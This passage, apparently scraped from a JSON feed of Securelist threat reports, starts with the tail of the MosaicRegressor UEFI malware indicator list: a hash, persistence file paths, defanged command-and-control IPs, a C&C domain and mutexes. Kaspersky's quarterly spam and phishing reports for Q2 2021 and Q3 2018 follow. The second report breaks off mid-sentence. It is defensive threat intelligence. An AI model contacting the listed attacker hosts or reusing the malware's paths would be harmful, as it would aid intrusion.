(cryptui.sep)\n\n**3rd Stage Payload**\n\nFA0A874926453E452E3B6CED045D2206 (load.rem)\n\n**File paths**\n\n%APPDATA%\\Microsoft\\Credentials\\MSI36C2.dat \n%APPDATA%\\Microsoft\\Internet Explorer\\%Computername%.dat \n%APPDATA%\\Microsoft\\Internet Explorer\\FileA.dll \n%APPDATA%\\Microsoft\\Internet Explorer\\FileB.dll \n%APPDATA%\\Microsoft\\Internet Explorer\\FileC.dll \n%APPDATA%\\Microsoft\\Internet Explorer\\FileD.dll \n%APPDATA%\\Microsoft\\Internet Explorer\\FileOutA.dat \n%APPDATA%\\Microsoft\\Network\\DFileA.dll \n%APPDATA%\\Microsoft\\Network\\DFileC.dll \n%APPDATA%\\Microsoft\\Network\\DFileD.dll \n%APPDATA%\\Microsoft\\Network\\subst.sep \n%APPDATA%\\Microsoft\\WebA.dll \n%APPDATA%\\Microsoft\\WebB.dll \n%APPDATA%\\Microsoft\\WebC.dll \n%APPDATA%\\Microsoft\\Windows\\LnkClass.dat \n%APPDATA%\\Microsoft\\Windows\\SendTo\\cryptui.sep \n%APPDATA%\\Microsoft\\Windows\\SendTo\\load.dll %APPDATA%\\Microsoft\\Windows\\load.rem \n%APPDATA%\\Microsoft\\Windows\\mapisp.dll \n%APPDATA%\\Microsoft\\exitUI.rs \n%APPDATA%\\Microsoft\\sppsvc.tbl \n%APPDATA%\\Microsoft\\subst.tbl \n%APPDATA%\\newplgs.dll \n%APPDATA%\\rfvtgb.dll \n%APPDATA%\\sdfcvb.dll \n%APPDATA%\\msreg.dll \n%APPDATA\\Microsoft\\dfsadu.dll \n%COMMON_APPDATA%\\Microsoft\\Windows\\user.rem \n%TEMP%\\BeFileA.dll \n%TEMP%\\BeFileC.dll \n%TEMP%\\RepairA.dll \n%TEMP%\\RepairB.dll \n%TEMP%\\RepairC.dll \n%TEMP%\\RepairD.dll \n%TEMP%\\wrtreg_32.dll \n%TEMP%\\wrtreg_64.dll \n%appdata%\\dwhost.exe \n%appdata%\\msreg.exe \n%appdata%\\return.exe \n%appdata%\\winword.exe\n\n**Domains and IPs**\n\n103.195.150[.]106 \n103.229.1[.]26 \n103.243.24[.]171 \n103.243.26[.]211 \n103.30.40[.]116 \n103.30.40[.]39 \n103.39.109[.]239 \n103.39.109[.]252 \n103.39.110[.]193 \n103.56.115[.]69 \n103.82.52[.]18 \n117.18.4[.]6 \n144.48.241[.]167 \n144.48.241[.]32 \n150.129.81[.]21 \n43.252.228[.]179 \n43.252.228[.]252 \n43.252.228[.]75 \n43.252.228[.]84 \n43.252.230[.]180 \nmenjitghyukl.myfirewall[.]org\n\n**Additional Suspected C&amp;Cs**\n\n43.252.230[.]173 \n185.216.117[.]91 \n103.215.82[.]161 \n103.96.72[.]148 \n122.10.82[.]30\n\n**Mutexes**\n\nFindFirstFile Message Bi \nset instance state \nforegrounduu state \nsingle UI \nOffice Module \nprocess attach Module", "cvss3": {}, "published": "2020-10-05T10:00:45", "type": "securelist", "title": "MosaicRegressor: Lurking in the Shadows of UEFI", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-0802"], "modified": "2020-10-05T10:00:45", "id": "SECURELIST:AFE852637D783B450E3C6DA74A37A5AB", "href": "https://securelist.com/mosaicregressor/98849/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-05T12:36:39", "description": "\n\n## Quarterly highlights\n\n### The corporate sector\n\nIn Q2 2021, corporate accounts continued to be one of the most tempting targets for cybercriminals. To add to the credibility of links in emails, scammers imitated mailings from popular cloud services. This technique has been used many times before. A fake notification about a Microsoft Teams meeting or a request to view an important document traditionally takes the victim to a phishing login page asking for corporate account credentials.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03142238/Spam_and_phishing_in_Q2_2021_01.png>)\n\nCybercriminals also faked emails from cloud services in schemes aimed at stealing not accounts but money. We saw, for example, spoofed messages about a comment added to a document stored in the cloud. The document itself most likely did not exist: at the other end of the link was the usual recipe for making a fast buck online by investing in Bitcoin or a similarly tempting offer. Such &quot;offers&quot; usually require the victim to pay a small amount upfront to claim their non-existent reward.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03142307/Spam_and_phishing_in_Q2_2021_02.png>)\n\nIn addition to various cloud-related emails, we blocked messages disguised as business correspondence and containing links to malware. In particular, an email threatening legal action claimed that the victim had not paid for a completed order. To resolve the issue amicably, the recipient was asked to review the documents confirming the order completion and to settle the bill by a certain date. The documents were supposedly available via the link provided and protected by a special code. In fact, the file named &quot;\u0414\u043e\u0433\u043e\u0432\u043e\u0440 \u21168883987726 \u043e\u0442 10.10.2021.pdf.exe&quot; (Agreement #8883987726 of 10.10.2021.pdf.exe) that the victim was asked to download was a malicious program known as Backdoor.Win32.RWS.a.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03142335/Spam_and_phishing_in_Q2_2021_03.png>)\n\n### COVID-19 compensation fraud\n\nIn Q2 2021, scammers continued to exploit the theme of pandemic-related compensation. This time, offers of financial assistance were mostly sent in the name of government agencies. &quot;The UK Government&quot; and &quot;the US Department of the Treasury&quot; were ready to pay out special grants to all-comers. However, attempts to claim the promised handout only led to monetary loss or compromised bank card details. It goes without saying that the grants did not materialize.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03142357/Spam_and_phishing_in_Q2_2021_04.png>)\n\nIt was bank card details, including CVV codes, that were the target of a gang of cybercriminals who created a fake informational website about social assistance for citizens of Belarus. To make the pages look official, the scammers described in detail the system of payouts depending on the applicant&#x27;s line of work and other conditions. The information bulletin issued in the name of the Belarus Ministry of Health clearly spelled out the payment amounts for medical staff. Workers in other fields were invited to calculate their entitled payout by clicking the Get Social Assistance button. This redirected the visitor to a page with a form for entering bank card details.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03142425/Spam_and_phishing_in_Q2_2021_05.png>)\n\n### Parcel scam: buy one, get none\n\nUnexpected parcels requiring payment by the recipient remained one of the most common tricks this past quarter. Moreover, cybercriminals became more adept at localizing their notifications: Q2 saw a surge in mass mailings in a range of languages. The reason for the invoice from the &quot;mail company&quot; could be anything from customs duties to shipment costs. When trying to pay for the service, as with compensation fraud, victims were taken to a fake website, where they risked not only losing the amount itself (which could be far higher than specified in the email), but also spilling their bank card details.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03142509/Spam_and_phishing_in_Q2_2021_06.png>)\n\nMailed items were the focus of one other fraudulent scheme. Websites appeared offering people the chance to buy out others&#x27; parcels that for some reason could not reach the intended recipients. The &quot;service&quot; was positioned as a lottery \u2014 the buyer paid only for the weight of the parcel (the bigger it was, the higher the price), and its contents were not disclosed. To find out what was inside, the lucky owner of the abandoned parcel had to wait for it to arrive at the specified address. Which it didn&#x27;t. According to the mail company Russian Post, when the storage period expires, registered items (parcels, letters, postcards, EMS items) are sent to the return address at the sender&#x27;s expense. If the sender does not collect the returned item within the storage period, it is considered &quot;unclaimed&quot; and stored for a further six months, after which it is destroyed. In other words, ownerless parcels are not sold. Therefore, any offer to buy them is evidently a scam.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03142815/Spam_and_phishing_in_Q2_2021_07.png>)\n\n### New movies: pay for the pleasure of not watching\n\nLate April saw the annual Oscars ceremony in Hollywood. Movies nominated for an Academy award naturally attract public as well as cybercriminal attention. As a consequence, fake websites popped up offering free viewings and even downloads of Oscar contenders. After launching a video, the visitor of the illegal movie theater was shown several clips of the film (usually taken from the official trailer), before being asked to pay a small subscription fee to continue watching. However, after payment of the &quot;subscription&quot; the movie screening did not resume; instead the attackers had a new bank account to play with.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03142842/Spam_and_phishing_in_Q2_2021_08.png>)\n\nIn fact, almost any big-budget movie is accompanied by the appearance of fake websites offering video or audio content long before its official release. Kaspersky found fake sites supposedly hosting _Friends: The Reunion_, a special episode of the popular sitcom. Fans who tried to watch or download the long-awaited continuation were redirected to a Columbia Pictures splash screen. After a few seconds, the broadcast stopped, replaced by a request to pay a nominal fee.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03142917/Spam_and_phishing_in_Q2_2021_09.png>)\n\n### Messenger spam: WhatsApp with that?\n\nIn messenger-based spam, we continued to observe common tricks to get users to part with a small amount of money. Victims were asked, for example, to take a short survey about WhatsApp and to send messages to several contacts in order to receive a prize. Another traditional scam aims to persuade the user that they are the lucky winner of a tidy sum. Both scenarios end the same way: the scammers promise a large payout, but only after receiving a small commission.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03143055/Spam_and_phishing_in_Q2_2021_10.png>)\n\nWhatsApp was bought by Facebook in 2014. In early 2021, the two companies&#x27; symbiotic relationship became a hot topic in connection with [WhatsApp&#x27;s new privacy policy](<https://www.wired.com/story/whatsapp-facebook-data-share-notification/>), allowing the messenger to exchange user information with its parent company. Cybercriminals took advantage of the rumor mill about the two companies. They set up fake websites inviting users to a WhatsApp chat with &quot;beautiful strangers&quot;. But when attempting to enter the chat room, the potential victim landed on a fake Facebook login page.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03143123/Spam_and_phishing_in_Q2_2021_11.png>)\n\nEmails with a link pointing to a fake WhatsApp voice message most likely belong to the same category. By following it, the recipient risks not only handing over their personal data to the attackers, but also downloading malware to their computer or phone.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03143142/Spam_and_phishing_in_Q2_2021_12.png>)\n\n### Investments and public property scams\n\nOffers of quick earnings with minimal effort remain one of the most common types of fraud. In Q2 2021, cybercriminals diversified their easy-money schemes. Email recipients were invited to invest in natural resources (oil, gas, etc.) or cryptocurrency secured by these resources. The topic of gas surfaced also in more conventional compensation scams. To make their offers more credible, cybercriminals used the brands of large companies. Having accepted investments, the scammers and their sites quickly disappeared along with the victims&#x27; money.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03143159/Spam_and_phishing_in_Q2_2021_13.png>)\n\nFor more suspicious minds, the cybercriminals set up a fake Gazprom anti-fraud website, where they posed as company employees, promising to compensate victims&#x27; losses. The cybercriminals claimed that those who had paid more than 60,000 rubles were entitled to compensation; however, the attacks were not targeted. Most likely, the scammers were counting on users being curious about whether they could claim compensation. Naturally, the help of the &quot;anti-fraudsters&quot; was not without strings attached, despite the advertised free consultation. &quot;Clients&quot; who filled out the form were asked to pay a small fee for the refund, whereupon the &quot;consultants&quot; vanished without compensating so much as a dime.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03143221/Spam_and_phishing_in_Q2_2021_14.png>)\n\nAnother high-earning scam cited client payouts under VTB Invest, VTB Bank&#x27;s digital asset management solution. Using the bank&#x27;s logos, the fraudsters offered &quot;active banking users&quot; the opportunity to receive &quot;payout from investors.&quot; After filling out the application form, indicating name, phone number and email, the potential victim saw a message stating that they are to receive a certain amount of money. Although the cybercriminals assured that no commission was payable, to receive the &quot;payout&quot; the applicant was required to provide bank card details or deposit a small sum, ostensibly to verify the account. In other words, it was the usual scheme in a different wrapper.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03143316/Spam_and_phishing_in_Q2_2021_15.png>)\n\n## Statistics: spam\n\n### Proportion of spam in mail traffic\n\nAfter a prolonged decline, the share of spam in global mail traffic began to grow again in Q2 2021, averaging 46.56%, up 0.89 p.p. against the previous reporting period.\n\n_Share of spam in global mail traffic, Q1 and Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03144632/01-en-spam-report-q2-2021.png>))_\n\nA look at the data by month shows that, having troughed in March (45.10%), the share of spam in global mail traffic rose slightly in April (45.29%), with further jumps in May (46.35%) and June (48.03%), which is comparable to Q4 2020.\n\n### Source of spam by country\n\nThe TOP 10 spam-source countries remained virtually unchanged from the first quarter. Russia (26.07%) is still in first place, its share having increased by 3.6 p.p., followed by Germany (13.97%) and the US (11.24%), whose contribution to the global flow of spam decreased slightly. China (7.78%) remains in fourth position.\n\n_Source of spam by country, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03144703/03-en-spam-report-q2-2021.png>))_\n\nThe Netherlands (4.52%), France (3.48%) and Spain (2.98%) held on to fifth, sixth and seventh, respectively. Only the last three positions in the TOP 10 experienced a slight reshuffle: Poland (1.69%) dropped out of the ranking, falling to 11th place, while Japan (2.53%) moved up to eighth. Brazil (2.27%) remained in ninth spot, while the last line in the ranking was claimed by India (1.70%).\n\n### Malicious mail attachments\n\nMail Anti-Virus blocked 34,224,215 malicious attachments in Q2, almost 4 million fewer than in the first three months of 2021.\n\n_Number of Mail Anti-Virus triggerings, Q1 and Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03144738/04-en-spam-report-q2-2021.png>))_\n\nPeak malicious activity came in June, when Kaspersky solutions blocked more than 12 million attachments, while May was the quietest with only 10.4 million.\n\n#### Malware families\n\nIn Q2, Trojans from the [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) family (7.09%) were the most common malicious attachments in spam, with their share increased by 1.3 p.p. These malicious programs, disguised as electronic documents, are often distributed in archives. In contrast, [Agesla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) Trojans (6.65%), which specialize in stealing credentials, shed 2.26 p.p. and dropped to second place. The [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) family (4.25%), which exploits Windows Task Scheduler, rounds out the TOP 3. These Trojans, like Badun, are gaining popularity.\n\n_TOP 10 malware families in mail traffic, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03144835/05-en-spam-report-q2-2021.png>))_\n\nExploits for [CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) (4.07%), an Equation Editor vulnerability popular with cybercriminals, gave ground and dropped to fourth place. Next come malicious [ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) disk images (3.29%). Sixth and eighth places were occupied by Noon spyware Trojans, which infect [any](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) (2.66%) or [only 32-bit](<https://threats.kaspersky.com/en/threat/Trojan-Spy.Win32.Noon/>) (2.47%) versions of Windows. [Androm](<https://threats.kaspersky.com/en/threat/Backdoor.MSIL.Androm/>) backdoors (2.55%) lie in seventh position, while the TOP 10 is rounded out by malicious documents in the [SAgent](<https://threats.kaspersky.com/en/threat/Trojan.MSOffice.SAgent/>) (2.42%) and [Agent](<https://threats.kaspersky.com/en/threat/Trojan-Downloader.MSOffice.Agent/>) (2.11%) families.\n\n_TOP 10 malicious attachments, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03144904/06-en-spam-report-q2-2021.png>))_\n\nThe TOP 10 attachments in spam differs only slightly from the ranking of malware families. The most widespread representative of Agent family fell short of the TOP 10, but the ranking did find room for a Trojan from the [Crypt](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Crypt/>) family (2.06%), which includes heavily [obfuscated](<https://encyclopedia.kaspersky.com/glossary/obfuscation/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) and encrypted programs.\n\n### Countries targeted by malicious mailings\n\nMore than anywhere else, Kaspersky solutions blocked malicious attachments on user devices in Spain (9.28%). The share of this country grew slightly against Q1 2021, adding 0.54 p.p. Second place was retained by Italy (6.38%), despite losing 1.21 p.p. Germany (5.26%) and Russia (5.82%) swapped places in Q2, while the UAE (5.36%) remained fourth, its share practically unchanged.\n\n_Countries targeted by malicious spam, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03144933/07-en-spam-report-q2-2021.png>))_\n\nFurther down in the Top 10 countries by number of users who came across malicious attachments in Q2 2021 are Vietnam (4.71%), Mexico (4.23%), Turkey (3.43%), Brazil (2.91%) and Malaysia (2.53%).\n\n## Statistics: phishing\n\nIn phishing terms, Q2 2021 was fairly uneventful. The Anti-Phishing system detected and blocked 50,398,193 attempted redirects, with only 3.87% of our users encountering such phishing links.\n\n### Geography of phishing attacks\n\nLooking at the share of users by country on whose devices the Anti-Phishing system was triggered, we see that Brazil (6.67%), which lost first place last quarter, is back at the top. It didn&#x27;t get far ahead from Israel (6.55%) and France (6.46%), which topped the Q1 list.\n\n_Geography of phishing attacks, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03145007/08-en-spam-report-q2-2021.png>))_\n\n### Top-level domains\n\nThe traditional leader among top-level domain zones used by cybercriminals to post phishing pages is COM (31.67%). The ORG domain (8.79%) moved up to second place, pushing XYZ (8.51%) into third.\n\n_Top-level domain zones most commonly used for phishing, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03145039/09-en-spam-report-q2-2021.png>))_\n\nThe fourth most popular domain zone among cybercriminals in Q2 was China&#x27;s CN (3.77%), followed by NET (3.53%). Russia&#x27;s RU (2.98%) dropped to sixth place, and Tokelau&#x27;s TK (1.65%) to eighth. Note also the cybercriminals&#x27; preference for international domain zones (six of the ten lines in this quarter&#x27;s ranking).\n\n### Organizations under attack\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nFor the first time since the start of the pandemic, online stores (19.54%) vacated the first line in the ranking of organizations most often used by cybercriminals as bait. Global internet portals (20.85%) stepped in as this quarter&#x27;s leader. Moreover, the share of both categories increased relative to Q1: by 3.77 and 5.35 p.p., respectively. Third place belongs to banks (13.82%), which gained 3.78 p.p. in Q2.\n\n_Distribution of organizations whose users were targeted by phishers, by category, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03145107/10-en-spam-report-q2-2021.png>))_\n\nOverall, the list of the most popular organization categories among cybercriminals remained practically unchanged since the previous quarter, except that the shares of instant messengers (6.27%) and social networks (7.26%) almost drew level, and phishers preferred financial services (2.09%) to IT companies (1.68%).\n\n## Conclusion\n\nIn Q2, as we expected, cybercriminals continued to hunt for corporate account credentials and exploit the COVID-19 theme. A curious takeaway was the spike in investment-related activity. On the whole, however, the quarter did not deliver any surprises.\n\nAs for Q3 forecasts, the share of cyberattacks on the corporate sector is likely to stay the same. This is because remote working has established a firm foothold in the labor market. Also, the COVID-19 topic is unlikely to disappear from spam. And if the current crop of vaccination and compensation scams weren&#x27;t enough, fraudsters could start utilizing newly identified strains of the virus to add variety and nowness to their schemes. What&#x27;s more, during the vacation season, pandemic or not, we expect an increase in demand for intercity and international travel; as a result, the risk of encountering fake websites when buying tickets or booking accommodation will rise. Lastly, we will likely see waves of tourist-targeted attacks during major sporting occasions, such as the Olympic Games in Japan. Such events are always accompanied by thematic spam.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-05T10:00:45", "type": "securelist", "title": "Spam and phishing in Q2 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2021-08-05T10:00:45", "id": "SECURELIST:A4072107882E39592149B0DB12585D70", "href": "https://securelist.com/spam-and-phishing-in-q2-2021/103548/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-11-11T14:37:58", "description": "\n\n## Quarterly highlights\n\n### Personal data in spam\n\nWe have often said that personal data is candy on a stick to fraudsters and must be kept safe (that is, not given out on dubious websites). It can be used to gain access to accounts and in targeted attacks and ransomware campaigns.\n\nIn Q3, we registered a surge of fraudulent emails in spam traffic. This type of scam [we have already reported](<https://securelist.com/cryptoransom-spam/83691/>) at the beginning of the year. A ransom (in bitcoins) is demanded in exchange for not disclosing the \"damaging evidence\" concerning the recipients. The new wave of emails contained users' actual personal data (names, passwords, phone numbers), which the scammers used to try to convince victims that they really had the information specified in the message. The spam campaign was carried out in several stages, and it is likely that the fraudsters made use of a range of personal information databases, as evidenced, for example, by the telephone number formats that varied from stage to stage.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06090042/181101-spam-and-phishing-in-q3-2018-1.png>)\n\nWhereas before, the target audience was primarily English-speaking, in September we logged a spate of mailings in other languages, including German, Italian, Arabic, and Japanese.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06090143/181101-spam-and-phishing-in-q3-2018-2.png>)\n\nThe amount demanded by the ransomers ranged from a few hundred to several thousand dollars. To collect the payments, different Bitcoin wallets were used, which changed from mailing to mailing. In July, 17 transactions worth more than 3 BTC ($18,000 at the then exchange rate) were made to one of such wallets.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06090324/181101-spam-and-phishing-in-q3-2018-3.png>)\n\n**_Transactions to scammers' Bitcoin wallets_**\n\nAlso in Q3, we detected a [malicious spam campaign](<https://securelist.com/loki-bot-stealing-corporate-passwords/87595/>) aimed at corporate users. The main target was passwords (for browsers, instant messengers, email and FTP clients, cryptocurrency wallets, etc.). The cybercriminals attempted to infect victim computers with Loki Bot malware, concealing it in ISO files attached to messages. The latter were made to look like business correspondence or notifications from well-to-do companies.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06090454/181101-spam-and-phishing-in-q3-2018-4.png>)\n\n### Malicious spam attacks against the banking sector\n\nThe owners of the Necurs botnet, which in Q2 was caught sending [malicious emails with IQY](<https://securelist.com/spam-and-phishing-in-q2-2018/87368/>) (Microsoft Excel Web Query) attachments, turned their attention to the banking sector and, like in Q2, used a non-typical file format for spam, this time PUB (Microsoft Publisher). Messages were sent to the email addresses of credit institutions in different countries, and the PUB file attachments contained Trojan loaders for downloading executable files (detected as [Backdoor.Win32.RA-based](<https://threats.kaspersky.com/en/threat/Backdoor.Win32.RA-based/>)) onto victim computers.\n\nWe observed that the owners of Necurs are making increasing use of various techniques to bypass security solutions and send malicious spam containing attachments with non-typical extensions so as not to arouse users' suspicion.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06090547/181101-spam-and-phishing-in-q3-2018-5.png>)\n\n### New iPhone launch\n\nLate Q3 saw the release of Apple's latest gizmo. Unsurprisingly, it coincided with a spike in email spam from Chinese \"companies\" offering Apple accessories and replica gadgets. Links in such messages typically point to a recently created, generic online store. Needless to say, having transferred funds to such one-day websites, you lose your money and your goods are not arriving.\n\nThe release also went hand in hand with a slight rise in both the number of phishing schemes exploiting Apple (and its services) and messages with malicious attachments:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06090709/181101-spam-and-phishing-in-q3-2018-8.png>)\n\n### Classic pharma spam in a new guise\n\nSpammers are constantly looking for ways to get round mail filters and increase the \"deliverability\" of their offers. To do so, they try to fabricate emails (both the contents and technical aspects) that look like messages from well-known companies and services. For example, they copy the layout of banking and other notifications and add bona fide headers in the fields that the user is sure to see.\n\nSuch techniques, typical of phishing and malicious campaigns, are being used more often in \"classic spam\" \u2013 for example, in messages offering prohibited medicines. For instance, this past quarter we detected messages disguised as notifications from major social networks, including LinkedIn. The messages contained a phoney link that we expected to point to a phishing form asking for personal data, but instead took us to a drug store.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06090804/181101-spam-and-phishing-in-q3-2018-9.png>)\n\nThis new approach is taken due to the fact that this type of spam in its traditional form has long been detectable by anti-spam solutions, so spammers started using disguises. We expect this trend to pick up steam.\n\n### Universities\n\nSince the start of the academic year, scammers' interest in gaining access to accounts on university websites has risen. We [registered attacks](<https://securelist.com/phishing-for-knowledge/88268/>) against 131 universities in 16 countries worldwide. Cybercriminals want to get their hands on both personal data and academic research.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06091020/181101-spam-and-phishing-in-q3-2018-10.png>)\n\n**_Fake login pages to personal accounts on university websites_**\n\n### Job search\n\nTo harvest personal data, attackers exploit the job-hunting efforts. Pages with application forms lure victims with tempting offers of careers in a big-name company, large salary, and the like.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06091513/181101-spam-and-phishing-in-q3-2018-11.png>)\n\n### Propagation methods\n\nThis quarter we are again focused on ways in which phishing and other illegitimate content is distributed by cybercriminals. But this time we also want to draw attention to methods that are gaining popularity and being actively exploited by attackers.\n\n#### Scam notifications\n\nSome browsers make it possible for websites to send notifications to users (for example, Push API in Chrome), and this technology has not gone unnoticed by cybercriminals. It is mainly deployed by websites that collaborate with various partner networks. With the aid of pop-up notifications, users are lured onto \"partner\" sites, where they are prompted to enter, for example, personal data. The owners of the resource receive a reward for every user they process.\n\nBy default, Chrome requests permission to enable notifications for each individual site, and so as to nudge the user into making an affirmative decision, the attackers state that the page cannot continue loading without a little click on the Allow button.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06091607/181101-spam-and-phishing-in-q3-2018-12.png>)\n\nHaving given the site permission to display notifications, many users simply forget about it, so when a pop-up message appears on the screen, they don't always understand where it came from.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06091821/181101-spam-and-phishing-in-q3-2018-13.png>)\n\n**_Notifications are tailored to the user's location and displayed in the appropriate language_**\n\nThe danger is that notifications can appear when the user is visiting a trusted resource. This can mislead the victim as regards the source of the message: everything seems to suggest it came from the trusted site currently open. The user might see, for instance, a \"notification\" about a funds transfer, giveaway, or tasty offer. They all generally lead to phishing sites, online casinos, or sites with fake giveaways and paid subscriptions:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06091953/181101-spam-and-phishing-in-q3-2018-14.png>)\n\n**_Examples of sites that open when users click on a notification_**\n\nClicking on a notification often leads to an online gift card generator, which we [covered](<https://securelist.com/giftcard-generators/86522>) earlier in the quarter (it also works in the opposite direction: the resource may prompt to enable push notifications). Such generators offer visitors the chance to generate free gift card codes for popular online stores. The catch is that in order to get the generated codes, the visitor needs to prove their humanness by following a special link. Instead of receiving a code, the user is sent on a voyage through a long chain of partner sites with invitations to take part in giveaways, fill out forms, download stuff, sign up for paid SMS mailings, and much more.\n\n#### Media\n\nThe use of media resources is a rather uncommon, yet effective way of distributing fraudulent content. This point is illustrated by the story of the quite popular WEX cryptocurrency exchange, which prior to 2017 went by the name of BTC-E. In August 2018, fake news was inserted into thematic \"third tier\" Russian media saying that, due to internal problems, the exchange was changing its domain name to wex.ac:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06092107/181101-spam-and-phishing-in-q3-2018-15.png>)\n\nThe wex.nz administration soon tweeted (its tweets are published on the exchange's home page) that wex.ac was just another imitator and warned users about transferring funds.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06092204/181101-spam-and-phishing-in-q3-2018-16.png>)\n\nBut that did not stop the scammers, who released more news about the exchange moving to a new domain. This time to the .sc zone:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06092323/181101-spam-and-phishing-in-q3-2018-17.png>)\n\n#### Instagram\n\nAmong the social media platforms used by scammers to distribute content, Instagram warrants a special mention. Only relatively recently have cybercriminals started paying attention to it. In Q3 2018, we came across many fake US Internal Revenue Service user accounts in this social network, as well as many others purporting to be an official account of one of the most widely-used Brazilian banks.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06085444/181101-spam-and-phishing-in-q3-2018-18.png>)\n\n**_Fake IRS accounts on Instagram_**\n\nScammers not only create fakes, but seek access to popular accounts: August this year saw a wave of account hacking sweep through the social network. We observed accounts changing owners as a result of phishing attacks with \"account verification\" prompts \u2013 users themselves delivered their credentials on a plate in the hope of [getting the cherished blue tick](<https://www.kaspersky.com/blog/instagram-hijack/23585>).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06085411/181101-spam-and-phishing-in-q3-2018-19.png>)\n\nBack when scammers offered to \"verify\" accounts, there was no such function in the social network: the administration itself decided whom to award the sacred \"badge.\" Now it is possible to [apply for one through the account settings](<https://help.instagram.com/1080769608648426>).\n\n## Statistics: spam\n\n### Proportion of spam in email traffic\n\n**_Proportion of spam in global email traffic, Q2 and Q3 2018 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06095003/spam-and-phishing-in-q3-2018_en_01.png>)_**\n\nIn Q3 2018, the largest share of spam was recorded in 